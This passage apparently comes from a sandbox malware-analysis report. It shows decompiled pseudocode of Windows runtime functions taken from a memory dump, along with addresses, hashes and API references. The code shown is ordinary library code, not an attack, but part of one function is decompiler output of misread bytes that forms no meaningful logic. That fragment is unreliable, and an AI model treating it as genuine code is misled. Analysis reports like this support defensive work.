						_push( *_t48);
						_t60 = E010EAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1198628; // 0x0
								_v68 = _t77;
								_t78 =  *0x119862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1198628; // 0x0
							_t116 =  *0x119862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                          0x010cb94c
                                          0x010cb956
                                          0x010cb95c
                                          0x010cb95e
                                          0x010cb964
                                          0x010cb969
                                          0x010cb96d
                                          0x010cb96d
                                          0x010cb970
                                          0x010cb974
                                          0x010cb97a
                                          0x010cbadf
                                          0x010cbadf
                                          0x010cbae2
                                          0x010cbae4
                                          0x010cbae6
                                          0x010cbaf0
                                          0x01112cb8
                                          0x010cbaf6
                                          0x010cbaf6
                                          0x010cbaf6
                                          0x010cbafd
                                          0x010cbb1f
                                          0x010cbb1f
                                          0x010cbaff
                                          0x010cbb00
                                          0x010cbb00
                                          0x010cbb03
                                          0x010cbb03
                                          0x010cbacb
                                          0x010cbacf
                                          0x010cbad0
                                          0x010cbad1
                                          0x010cbadc
                                          0x010cbadc
                                          0x010cb980
                                          0x010cb980
                                          0x010cb988
                                          0x010cb98b
                                          0x010cb98d
                                          0x010cb990
                                          0x010cb993
                                          0x010cb999
                                          0x010cb99b
                                          0x010cb9a1
                                          0x010cb9a5
                                          0x010cb9aa
                                          0x010cb9b0
                                          0x010cb9bb
                                          0x010cb9c0
                                          0x010cb9c3
                                          0x010cb9ca
                                          0x010cb9cc
                                          0x010cb9cf
                                          0x010cb9d3
                                          0x010cb9d7
                                          0x010cba94
                                          0x010cba94
                                          0x010cba98
                                          0x010cbaa3
                                          0x01112ccb
                                          0x010cbaa9
                                          0x010cbaa9
                                          0x010cbaa9
                                          0x010cbab1
                                          0x01112cd5
                                          0x01112cdd
                                          0x01112cdd
                                          0x010cbabb
                                          0x010cbabc
                                          0x010cbac2
                                          0x010cbac3
                                          0x010cbac3
                                          0x010cbac6
                                          0x00000000
                                          0x010cb9dd
                                          0x010cb9dd
                                          0x010cb9e7
                                          0x010cb9e7
                                          0x010cb9ec
                                          0x010cb9ec
                                          0x010cb9f1
                                          0x010cb9f5
                                          0x010cb9fa
                                          0x010cba00
                                          0x010cba0c
                                          0x010cba10
                                          0x010cba10
                                          0x010cba12
                                          0x010cba18
                                          0x00000000
                                          0x00000000
                                          0x010cbb26
                                          0x010cbb26
                                          0x010cba1e
                                          0x010cba1e
                                          0x010cba23
                                          0x010cba25
                                          0x010cba2c
                                          0x010cba30
                                          0x010cba35
                                          0x010cba35
                                          0x010cba41
                                          0x010cba46
                                          0x010cba4c
                                          0x010cba50
                                          0x010cba54
                                          0x010cba6a
                                          0x010cba6e
                                          0x010cba70
                                          0x010cba74
                                          0x010cba78
                                          0x010cba7a
                                          0x010cba7c
                                          0x010cba8e
                                          0x010cba90
                                          0x010cba92
                                          0x010cbb14
                                          0x010cbb14
                                          0x010cbb16
                                          0x010cbb16
                                          0x00000000
                                          0x010cba7c
                                          0x010cbb0a
                                          0x010cbb0d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010cbb0f

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010CB9A5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 885266447-0
                                          • Opcode ID: 4bb37ccc6754e912082b3ede17e0883feb601ace4e0ed1c8c0a95dce87c17ad3
                                          • Instruction ID: 080871269b358b0078dd388e7b3ee47716b66832cadd29fe1424602cd65d564b
                                          • Opcode Fuzzy Hash: 4bb37ccc6754e912082b3ede17e0883feb601ace4e0ed1c8c0a95dce87c17ad3
                                          • Instruction Fuzzy Hash: D3511271A08341CFC724DF6DC08192EBBE5BB88A90F24896EEAD587355D771E844CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010AB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E010AB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x117f7a8);
				E010FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E010FD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E010ED000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E010EF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L010FDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E010EB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E010EB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E010EE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E010EA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                          0x010ab171
                                          0x010ab171
                                          0x010ab171
                                          0x010ab171
                                          0x010ab171
                                          0x010ab176
                                          0x010ab17b
                                          0x010ab180
                                          0x010ab186
                                          0x010ab18f
                                          0x010ab198
                                          0x010ab1a4
                                          0x010ab1aa
                                          0x01104802
                                          0x01104802
                                          0x01104805
                                          0x0110480c
                                          0x0110480e
                                          0x010ab1d1
                                          0x010ab1d3
                                          0x010ab1de
                                          0x010ab1de
                                          0x01104817
                                          0x0110481e
                                          0x01104820
                                          0x01104822
                                          0x01104822
                                          0x01104824
                                          0x01104824
                                          0x0110482a
                                          0x00000000
                                          0x00000000
                                          0x01104835
                                          0x0110483a
                                          0x0110483d
                                          0x0110483f
                                          0x01104842
                                          0x01104842
                                          0x01104842
                                          0x01104846
                                          0x0110484c
                                          0x0110484e
                                          0x01104851
                                          0x01104851
                                          0x01104853
                                          0x01104854
                                          0x01104854
                                          0x01104858
                                          0x0110485a
                                          0x0110485a
                                          0x0110485d
                                          0x0110485f
                                          0x01104861
                                          0x01104861
                                          0x01104866
                                          0x0110486b
                                          0x0110486e
                                          0x01104871
                                          0x01104876
                                          0x01104876
                                          0x01104878
                                          0x0110487b
                                          0x01104884
                                          0x01104884
                                          0x00000000
                                          0x0110487d
                                          0x0110487d
                                          0x01104882
                                          0x01104889
                                          0x01104889
                                          0x0110488f
                                          0x01104891
                                          0x011048e0
                                          0x011048e2
                                          0x011048e4
                                          0x011048e4
                                          0x011048e7
                                          0x011048e7
                                          0x011048ed
                                          0x011048f4
                                          0x011048f6
                                          0x01104951
                                          0x01104951
                                          0x01104953
                                          0x01104953
                                          0x01104956
                                          0x01104956
                                          0x01104958
                                          0x01104959
                                          0x01104959
                                          0x0110495d
                                          0x0110495d
                                          0x0110495f
                                          0x0110495f
                                          0x01104965
                                          0x01104969
                                          0x011049ba
                                          0x011049ba
                                          0x011049c1
                                          0x011049c5
                                          0x011049cc
                                          0x011049d4
                                          0x011049d7
                                          0x011049da
                                          0x011049e4
                                          0x011049e5
                                          0x011049f3
                                          0x01104a02
                                          0x00000000
                                          0x01104a02
                                          0x01104972
                                          0x01104974
                                          0x00000000
                                          0x00000000
                                          0x01104976
                                          0x01104979
                                          0x01104982
                                          0x01104983
                                          0x01104984
                                          0x0110498b
                                          0x0110498d
                                          0x01104991
                                          0x01104993
                                          0x01104999
                                          0x0110499d
                                          0x011049a2
                                          0x011049a2
                                          0x011049a2
                                          0x01104999
                                          0x011049ac
                                          0x00000000
                                          0x011049b3
                                          0x011048f8
                                          0x011048fe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011048fe
                                          0x01104895
                                          0x0110489c
                                          0x011048ad
                                          0x011048b2
                                          0x011048b5
                                          0x011048b7
                                          0x011048ba
                                          0x011048bc
                                          0x011048c6
                                          0x011048c6
                                          0x011048cb
                                          0x011048d1
                                          0x011048d4
                                          0x011048d8
                                          0x011048d8
                                          0x00000000
                                          0x011048d8
                                          0x011048be
                                          0x011048c0
                                          0x00000000
                                          0x00000000
                                          0x011048c2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011048c4
                                          0x00000000
                                          0x01104882
                                          0x0110487b
                                          0x01104904
                                          0x01104906
                                          0x00000000
                                          0x00000000
                                          0x01104908
                                          0x0110490e
                                          0x00000000
                                          0x00000000
                                          0x01104910
                                          0x01104917
                                          0x01104917
                                          0x00000000
                                          0x01104917
                                          0x010ab1ba
                                          0x011047f9
                                          0x011047fc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011047fc
                                          0x010ab1c0
                                          0x010ab1c0
                                          0x010ab1c3
                                          0x010ab1cb
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: _vswprintf_s
                                          • String ID:
                                          • API String ID: 677850445-0
                                          • Opcode ID: d0c51e213e3d25295421fe404dd448254e2fc9ea4e7ee355df88bb8422006d1c
                                          • Instruction ID: 501c5b33a3604d8ede20d84c1ffb861aecd7c05730cf8c3d1f8d7d5f153daa01
                                          • Opcode Fuzzy Hash: d0c51e213e3d25295421fe404dd448254e2fc9ea4e7ee355df88bb8422006d1c
                                          • Instruction Fuzzy Hash: 7551D771D002598EDF3ACFA8C8857AEBBF0BF04710F1145AEDA999B6C1D7B04A41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E010D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				signed int _t237;
				signed int _t247;
				signed int _t249;
				intOrPtr _t251;
				signed int _t254;
				signed int _t261;
				signed int _t264;
				signed int _t272;
				signed int _t278;
				signed int _t280;
				void* _t283;
				signed int _t284;
				unsigned int _t287;
				signed int _t291;
				void* _t292;
				signed int _t293;
				signed int _t297;
				intOrPtr _t309;
				signed int _t318;
				signed int _t320;
				signed int _t321;
				signed int _t325;
				signed int _t326;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				void* _t334;
				void* _t337;

				_t331 = _t333;
				_t334 = _t333 - 0x4c;
				_v8 =  *0x119d360 ^ _t331;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t325 = 0x119b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t278 = 0x48;
				_t307 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t318 = 0;
				_v37 = _t307;
				if(_v48 <= 0) {
					L16:
					_t45 = _t278 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t326 = 0xc0000106;
						goto L32;
					} else {
						_t325 = L010C4620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t278);
						_v52 = _t325;
						__eflags = _t325;
						if(_t325 == 0) {
							_t326 = 0xc0000017;
							goto L32;
						} else {
							 *(_t325 + 0x44) =  *(_t325 + 0x44) & 0x00000000;
							_t50 = _t325 + 0x48; // 0x48
							_t320 = _t50;
							_t307 = _v32;
							 *(_t325 + 0x3c) = _t278;
							_t280 = 0;
							 *((short*)(_t325 + 0x30)) = _v48;
							__eflags = _t307;
							if(_t307 != 0) {
								 *(_t325 + 0x18) = _t320;
								__eflags = _t307 - 0x1198478;
								 *_t325 = ((0 | _t307 == 0x01198478) - 0x00000001 & 0xfffffffb) + 7;
								E010EF3E0(_t320,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
								_t307 = _v32;
								_t334 = _t334 + 0xc;
								_t280 = 1;
								__eflags = _a8;
								_t320 = _t320 + (( *_t307 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t272 = E011339F2(_t320);
									_t307 = _v32;
									_t320 = _t272;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t326 = _v68;
								__eflags = 0;
								 *((short*)(_t320 - 2)) = 0;
								goto L32;
							} else {
								_t278 = _t325 + _t280 * 4;
								_v56 = _t278;
								do {
									__eflags = _t307;
									if(_t307 != 0) {
										_t230 =  *(_v60 + _t291 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t278 =  *(_v60 + _t291 * 4);
										 *(_t278 + 0x18) = _t320;
										_t234 =  *(_v60 + _t291 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M010D2959))) {
												case 0:
													__ax =  *0x1198488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E010EF3E0(__edi,  *0x119848c, __ax & 0x0000ffff);
														__eax =  *0x1198488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E010EF3E0(_t320, _v80, _v64);
													_t267 = _v64;
													goto L26;
												case 2:
													 *0x1198480 & 0x0000ffff = E010EF3E0(__edi,  *0x1198484,  *0x1198480 & 0x0000ffff);
													__eax =  *0x1198480 & 0x0000ffff;
													__eax = ( *0x1198480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E010EF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E010EF3E0(_t320, _v76, _v36);
														_t267 = _v36;
													}
													L26:
													_t334 = _t334 + 0xc;
													_t320 = _t320 + (_t267 >> 1) * 2 + 2;
													__eflags = _t320;
													L27:
													_push(0x3b);
													_pop(_t269);
													 *((short*)(_t320 - 2)) = _t269;
													goto L28;
												case 6:
													__ebx =  *0x119575c;
													__eflags = __ebx - 0x119575c;
													if(__ebx != 0x119575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E010EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x119575c;
														} while (__ebx != 0x119575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1198478 & 0x0000ffff = E010EF3E0(__edi,  *0x119847c,  *0x1198478 & 0x0000ffff);
													__eax =  *0x1198478 & 0x0000ffff;
													__eax = ( *0x1198478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E011339F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1196e58 & 0x0000ffff = E010EF3E0(__edi,  *0x1196e5c,  *0x1196e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1196e58 & 0x0000ffff;
													__eax = ( *0x1196e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t307 = _v32;
													L29:
													_t278 = _t278 + 4;
													__eflags = _t278;
													_v56 = _t278;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t318 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M010D2935))) {
							case 0:
								__ax =  *0x1198488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t307 =  &_v64;
								_v80 = E010D2E3E(0,  &_v64);
								_t278 = _t278 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1198480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1198480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E010BEEF0(0x11979a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E010BEB70(__ecx, 0x11979a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t326;
												if(_t326 < 0) {
													L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1197b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E010BEB70(__ecx, 0x11979a0);
										__eax = _v52;
										L36:
										_pop(_t319);
										_pop(_t327);
										__eflags = _v8 ^ _t331;
										_pop(_t279);
										return E010EB640(_t209, _t279, _v8 ^ _t331, _t307, _t319, _t327);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t274 = _v56;
								if(_v56 != 0) {
									_t307 =  &_v36;
									_t276 = E010D2E3E(_t274,  &_v36);
									_t287 = _v36;
									_v76 = _t276;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t278 = _t278 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x1195764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1198478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1198478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1196e58 & 0x0000ffff;
								__eax = ( *0x1196e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t318 = _t318 + 1;
								if(_t318 >= _v48) {
									goto L16;
								} else {
									_t307 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t292 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("daa");
					_t237 = (_t234 | 0x0d286601) + _t334 | 0x0d262e01;
					 *((intOrPtr*)(_t325 + 0x28)) =  *((intOrPtr*)(_t325 + 0x28)) + _t237;
					 *_t320 =  *_t320 + _t278;
					asm("adc [ecx], eax");
					 *0x115b3501 =  *0x115b3501 - _t292;
					 *_t307 =  *_t307 + _t334;
					 *0xd288001 =  *0xd288001 - _t292;
					_t328 = _t325 + _t325;
					asm("daa");
					 *((intOrPtr*)(_t325 + _t325 + 0x28)) =  *((intOrPtr*)(_t325 + _t325 + 0x28)) + _t292;
					_pop(_t283);
					asm("adc [ecx], eax");
					_t337 = (_t237 | 0x0d260501) + _t292;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x117ff00);
					E010FD08C(_t283, _t320, _t328);
					_v44 =  *[fs:0x18];
					_t321 = 0;
					 *_a24 = 0;
					_t284 = _a12;
					__eflags = _t284;
					if(_t284 == 0) {
						_t247 = 0xc0000100;
					} else {
						_v8 = 0;
						_t329 = 0xc0000100;
						_v52 = 0xc0000100;
						_t249 = 4;
						while(1) {
							_v40 = _t249;
							__eflags = _t249;
							if(_t249 == 0) {
								break;
							}
							_t297 = _t249 * 0xc;
							_v48 = _t297;
							__eflags = _t284 -  *((intOrPtr*)(_t297 + 0x1081664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t264 = E010EE5C0(_a8,  *((intOrPtr*)(_t297 + 0x1081668)), _t284);
									_t337 = _t337 + 0xc;
									__eflags = _t264;
									if(__eflags == 0) {
